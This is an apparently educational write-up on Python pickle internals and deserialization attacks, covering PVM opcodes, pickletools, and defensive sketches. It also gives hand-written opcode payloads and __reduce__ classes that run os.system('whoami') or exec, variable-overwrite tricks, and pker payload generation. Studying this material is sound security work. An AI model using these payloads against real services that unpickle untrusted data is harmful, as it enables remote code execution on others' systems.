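The pickle serialization process
Pickle data is parsed by the PVM (Pickle Virtual Machine), which consists of three parts:
Instruction processor (parsing engine): reads opcodes and their arguments until it reaches `.` (STOP); the value left on top of the stack is returned as the deserialized object
stack: implemented as a Python list, used to hold data, arguments and objects temporarily
memo: implemented as a Python dict, provides storage for the whole lifetime of the PVM, keeping already-built objects as key-value pairs (index to object) so they can be fetched again later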
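To see the memo at work, a small sketch (the variable names are arbitrary) pickles the same list twice inside another list. The second reference is not serialized again; it is written as a GET (`g`) that reads the stored object back from the memo, so object identity survives the round trip.

```python
import pickle
import pickletools

shared = ["x"]
data = [shared, shared]  # the same list object referenced twice

ser = pickle.dumps(data, protocol=0)
pickletools.dis(ser)  # the second reference appears as a GET from the memo

restored = pickle.loads(ser)
# The memo hands back the object it stored, so both slots are one list.
print(restored[0] is restored[1])  # True
```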
opcode
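Different pickle protocol versions produce different opcodes, but pickle is backward compatible: data serialized with protocol v0 can be parsed by any later version.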
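A quick sketch to check this on the local interpreter: the same dict is dumped with every supported protocol and loaded back without telling `loads()` which protocol was used. Protocol 2 and later begin with the PROTO opcode (`\x80`) followed by the version number, while protocol 0 has no header and is plain ASCII text.

```python
import pickle

obj = {"abc": 123, "456": "DEF"}
headers = {}

for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    ser = pickle.dumps(obj, protocol=proto)
    # loads() works out the protocol from the data itself.
    assert pickle.loads(ser) == obj
    headers[proto] = ser[:2]
    print(proto, headers[proto])

# Protocol 0 output contains only ASCII characters, so this decode succeeds.
pickle.dumps(obj, protocol=0).decode("ascii")
```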
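Common v0 opcodes:
c: `c[module]\n[name]\n`, imports the global object `name` from `module` and pushes it; equivalent to `from module import name`
o: finds the most recent MARK on the stack; of the items above it, the first (must be callable) is the callable and the second through n-th are its arguments; calls the callable (or instantiates a class) and pushes the return value (or the new object)
(: pushes a MARK onto the stack
S: `S'xxx'\n`, creates a string object and pushes it
s: takes the second item from the top as the key and the top item as the value, and adds or updates that pair in the third item (must be a dict or list); the key and value are popped and the third item (the dict or list) is updated in place
V: `Vxxx\n`, creates a Unicode string object and pushes it
i: `i[module]\n[callable]\n`, first fetches a global (like c), then finds the most recent MARK, packs the items above it into a tuple and calls the global with that tuple as its arguments (or instantiates a class); the MARK and the items are popped and the return value (or the new object) is pushed
d: finds the most recent MARK and builds a dict from the items above it; there must be an even number of items, forming key-value pairs; the MARK and the items are popped and the dict is pushed
b: uses the top item (a dict holding the state) to set attributes on the second item (an object instance), calling `__setstate__` if it exists and otherwise updating `__dict__`; the top item is popped
t: finds the most recent MARK and builds a tuple from the items above it; the MARK and the items are popped and the tuple is pushed
R: pops the argument tuple from the top of the stack and the callable beneath it, calls the callable with those arguments, and pushes the return value
p: `pn\n`, stores the top of the stack in memo[n] (the item stays on the stack)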
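To make the stack and memo behaviour of these opcodes concrete, here is a toy interpreter for a small protocol-0 subset. It is a teaching sketch, not CPython's `Unpickler`: it does no escape handling for `S`/`V`, and `c` only resolves globals from a hypothetical whitelist (`ALLOWED_GLOBALS`) so the toy cannot be used to call arbitrary functions.

```python
import importlib

MARK = object()  # sentinel pushed by '('

# Hypothetical whitelist for this toy; the real pickle module resolves any global.
ALLOWED_GLOBALS = {("builtins", "len"), ("builtins", "str")}


def toy_pvm(data: bytes):
    """Interpret a tiny protocol-0 subset: ( S V I t d s p g c R ."""
    stack, memo = [], {}
    pos = 0

    def readline() -> str:
        nonlocal pos
        end = data.index(b"\n", pos)
        line = data[pos:end].decode("ascii")
        pos = end + 1
        return line

    def pop_mark() -> list:
        # Return the items above the most recent MARK and pop them with the MARK.
        for i in range(len(stack) - 1, -1, -1):
            if stack[i] is MARK:
                items = stack[i + 1:]
                del stack[i:]
                return items
        raise ValueError("no MARK on the stack")

    while True:
        op = data[pos:pos + 1]
        pos += 1
        if op == b"(":
            stack.append(MARK)
        elif op == b"S":
            stack.append(readline()[1:-1])  # strip the quotes, no escapes
        elif op == b"V":
            stack.append(readline())
        elif op == b"I":
            stack.append(int(readline()))
        elif op == b"t":
            stack.append(tuple(pop_mark()))
        elif op == b"d":
            items = pop_mark()
            stack.append(dict(zip(items[::2], items[1::2])))
        elif op == b"s":
            value = stack.pop()
            key = stack.pop()
            stack[-1][key] = value  # third item is updated in place
        elif op == b"p":
            memo[int(readline())] = stack[-1]  # store without popping
        elif op == b"g":
            stack.append(memo[int(readline())])
        elif op == b"c":
            module, name = readline(), readline()
            if (module, name) not in ALLOWED_GLOBALS:
                raise ValueError(f"{module}.{name} is not allowed in this toy")
            stack.append(getattr(importlib.import_module(module), name))
        elif op == b"R":
            args = stack.pop()  # top of stack: the argument tuple
            func = stack.pop()  # beneath it: the callable
            stack.append(func(*args))
        elif op == b".":
            return stack.pop()  # whatever is on top is the result
        else:
            raise ValueError(f"unsupported opcode {op!r}")


print(toy_pvm(b"(dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns."))  # {'abc': 123, '456': 'DEF'}
print(toy_pvm(b"cbuiltins\nlen\n(S'whoami'\ntR."))  # 6
```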
pickletools
pickletools can disassemble opcodes into a readable listing, for example:
import pickle
import pickletools
a = {"abc":123, "456":"DEF"}
ser = pickle.dumps(a, protocol=0)
print(b"opcode: " + ser)
pickletools.dis(ser)
Output:
b'opcode: (dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns.'
0: ( MARK
1: d DICT (MARK at 0)
2: p PUT 0
5: V UNICODE 'abc'
10: p PUT 1
13: I INT 123
18: s SETITEM
19: V UNICODE '456'
24: p PUT 2
27: V UNICODE 'DEF'
32: p PUT 3
35: s SETITEM
36: . STOP
highest protocol among opcodes = 0
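`pickletools.genops()` walks the same opcode stream without executing it, yielding `(opcode_info, argument, position)` tuples. A minimal sketch that lists opcode names and flags the ones that import globals, call objects or set object state (the set below is an illustrative choice, a heuristic rather than a sandbox):

```python
import pickle
import pickletools

# Illustrative set: opcodes that import globals, call objects or set state.
SUSPICIOUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                      "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def opcode_names(data: bytes) -> list:
    # genops only parses the stream; nothing is imported or called.
    return [op.name for op, arg, pos in pickletools.genops(data)]


ser = pickle.dumps({"abc": 123, "456": "DEF"}, protocol=0)
print(opcode_names(ser))

payload = b"cos\nsystem\n(S'whoami'\ntR."
print(sorted(set(opcode_names(payload)) & SUSPICIOUS_OPCODES))  # ['GLOBAL', 'REDUCE']
```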
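Exploiting pickle deserialization
RCE
The __reduce__() magic method is called during serialization, i.e. in pickle.dumps(); its return value determines what happens during deserialization, i.e. in pickle.loads():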
def __reduce__(self) -> str | tuple[Any, ...]: ...
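It must return either a string or a tuple. A string is interpreted as the name of a global variable; returning a tuple is what makes code execution possible:
def __reduce__(self):
    return (callable, (arg1, arg2, ...))
callable is the function to execute and (arg1, arg2, ...) is the tuple of arguments passed to it. A simple example:
import pickle
class test(object):
    def __reduce__(self):
        s = "print('command1 executed');print('command2 executed')"  # code to execute
        return (exec, (s,))
ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)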
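To see what `__reduce__()` actually turns into, a sketch that swaps `exec` for the harmless `len` (an illustrative substitution) and disassembles the result. `dumps()` only records the callable and its argument tuple as GLOBAL, MARK ... TUPLE and REDUCE opcodes; the call itself happens inside `loads()`.

```python
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        # Same (callable, args) shape as above, with a harmless callable.
        return (len, ("whoami",))


ser = pickle.dumps(Demo(), protocol=0)
pickletools.dis(ser)  # GLOBAL, MARK, UNICODE, TUPLE, REDUCE, STOP (plus PUTs)
result = pickle.loads(ser)  # runs len("whoami"); no Demo instance is rebuilt
print(result)  # 6
```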
Variable overwriting
import pickle
key = 1
class test(object):
    def __reduce__(self):
        s = "key=258"
        return (exec, (s,))
ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)
print(key)  # 258
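Hand-writing opcodes
__reduce__() only returns one callable plus its arguments, so if exec is filtered or disabled it can no longer be used to run multiple statements; in that case the opcodes have to be written by hand
Variable overwriting
secret.py:
key = "sxc"
Attempt to overwrite the variable in secret.py (this works because the script has imported secret, so `c__main__\nsecret\n` resolves to the module object, and `b` then updates the module's `__dict__`):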
import pickle
import secret
opcode = """c__main__
secret
(S'key'
S'258'
db.
"""
print(secret.key) # sxc
pickle.loads(opcode.encode())
print(secret.key) # 258
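The same BUILD trick can be wrapped in a small helper. `build_overwrite_payload` below is a hypothetical name, and the demo uses stand-in modules registered in `sys.modules` (`secret_demo` plays secret.py, `main_demo` plays the `__main__` that imported it) so the sketch runs on its own. Only `str` keys and values are handled; each becomes an `S'...'` line.

```python
import pickle
import sys
import types


def build_overwrite_payload(parent: str, name: str, attrs: dict) -> bytes:
    """Hypothetical helper: GLOBAL parent.name, MARK, S key/value lines, DICT, BUILD, STOP."""
    body = "".join(f"S{k!r}\nS{v!r}\n" for k, v in attrs.items())
    return f"c{parent}\n{name}\n({body}db.".encode()


# Stand-in modules so the example is self-contained.
secret = types.ModuleType("secret_demo")
secret.key = "sxc"
holder = types.ModuleType("main_demo")
holder.secret = secret  # like "import secret" inside __main__
sys.modules["secret_demo"] = secret
sys.modules["main_demo"] = holder

payload = build_overwrite_payload("main_demo", "secret", {"key": "258"})
print(payload)
print(secret.key)  # sxc
pickle.loads(payload)  # BUILD updates secret.__dict__
print(secret.key)  # 258
```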
RCE
Commands can be executed through any of the three opcodes R, i and o:
R:
cos
system
(S'whoami'
tR.
i:
(S'whoami'
ios
system
.
o:
(cos
system
S'whoami'
o.
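All three forms can be checked without running a shell by swapping `os.system` for the harmless builtin `len` (an illustrative substitution). Each payload below ends up calling `len('whoami')` while it is being unpickled:

```python
import pickle

payloads = {
    "R": b"cbuiltins\nlen\n(S'whoami'\ntR.",  # callable pushed first, args tuple on top
    "i": b"(S'whoami'\nibuiltins\nlen\n.",    # args after MARK, global named by i
    "o": b"(cbuiltins\nlen\nS'whoami'\no.",    # callable is the first item after MARK
}

results = {}
for opcode, payload in payloads.items():
    results[opcode] = pickle.loads(payload)
    print(opcode, results[opcode])  # each prints 6
```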
Instantiating an object
import pickle
class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age
opcode='''c__main__
User
(S'ChuanSao'
S"258"
tR.'''
user = pickle.loads(opcode.encode())
print(user.name, user.age) # ChuanSao 258
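`S` always produces a `str`, which is why `user.age` above is the string `'258'`. A sketch using the protocol-0 `I` opcode instead yields an integer. To keep the example independent of how it is launched, `User` is registered under a stand-in module name, `user_demo` (a hypothetical name), rather than looked up in `__main__`.

```python
import pickle
import sys
import types


class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age


# Stand-in module so that c<module>\nUser\n can resolve the class.
demo = types.ModuleType("user_demo")
demo.User = User
sys.modules["user_demo"] = demo

opcode = b"cuser_demo\nUser\n(S'ChuanSao'\nI258\ntR."
user = pickle.loads(opcode)
print(user.name, user.age, type(user.age).__name__)  # ChuanSao 258 int
```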
pker
Tools for converting Python source code to Pickle opcode automatically
Repository: https://github.com/eddieivan01/pker
pker mainly relies on three special functions, GLOBAL, INST and OBJ, plus a few other conversions:
GLOBAL corresponds to opcode: c
GLOBAL('os', 'system') corresponds to opcode: cos\nsystem\n
INST corresponds to opcode: i
INST('os', 'system', 'whoami') corresponds to opcode: (S'whoami'\nios\nsystem\n
OBJ corresponds to opcode: o
OBJ(GLOBAL('os', 'system'), 'whoami') corresponds to opcode: (cos\nsystem\nS'whoami'\no
xxx.attr='sxc' corresponds to opcode: (S'attr'\nS'sxc'\ndb
return corresponds to opcode: .
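The mapping above is simple enough to mimic in a few lines. This is a hypothetical re-implementation for illustration, not pker's actual code: only `str` arguments are supported, `Op` is an invented marker type for already-encoded fragments, and `RETURN` stands in for pker's `return`.

```python
import pickle


class Op(str):
    """An already-encoded opcode fragment (hypothetical, not pker's own code)."""


def _arg(value):
    # Opcode fragments pass through; plain str arguments become S'...' lines.
    if isinstance(value, Op):
        return value
    if isinstance(value, str):
        return Op(f"S{value!r}\n")
    raise TypeError(f"unsupported argument type: {type(value).__name__}")


def GLOBAL(module, name):
    return Op(f"c{module}\n{name}\n")


def INST(module, name, *args):
    return Op("(" + "".join(_arg(a) for a in args) + f"i{module}\n{name}\n")


def OBJ(callable_op, *args):
    return Op("(" + _arg(callable_op) + "".join(_arg(a) for a in args) + "o")


def RETURN(op):
    # pker's `return` maps to the STOP opcode.
    return (op + ".").encode()


print(RETURN(INST("os", "system", "whoami")))  # b"(S'whoami'\nios\nsystem\n."
```

Printing the payload only builds the bytes; nothing is executed until it is passed to `pickle.loads()`.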
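Basic usage
pker source (saved in a file named pker):
INST('os', 'system', 'whoami')
return
Convert it to opcode with pker.py:
python pker.py < pker
b"(S'whoami'\nios\nsystem\n."
Opcode table (the opcode constants as defined in CPython's Lib/pickle.py):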
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
# Protocol 5
BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly
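The same information is available at runtime: `pickletools.opcodes` holds an `OpcodeInfo` record for every real opcode, including its one-character `code`, its `name` and the protocol (`proto`) that introduced it. TRUE and FALSE above are INT shorthands, so they have no entry. A short sketch that builds a lookup table from it:

```python
import pickle
import pickletools

# code (a 1-character str) -> (name, protocol that introduced it)
table = {op.code: (op.name, op.proto) for op in pickletools.opcodes}

for code in ["(", "c", "R", "i", "o", "b", "\x80", "\x93"]:
    name, proto = table[code]
    print(repr(code), name, "protocol", proto)

# The byte constants in pickle.py map onto the same entries.
print(table[pickle.REDUCE.decode("latin-1")])  # ('REDUCE', 0)
```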
References:
https://xz.aliyun.com/news/13498
https://xz.aliyun.com/news/7032
https://zixyd.github.io/2024/02/06/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/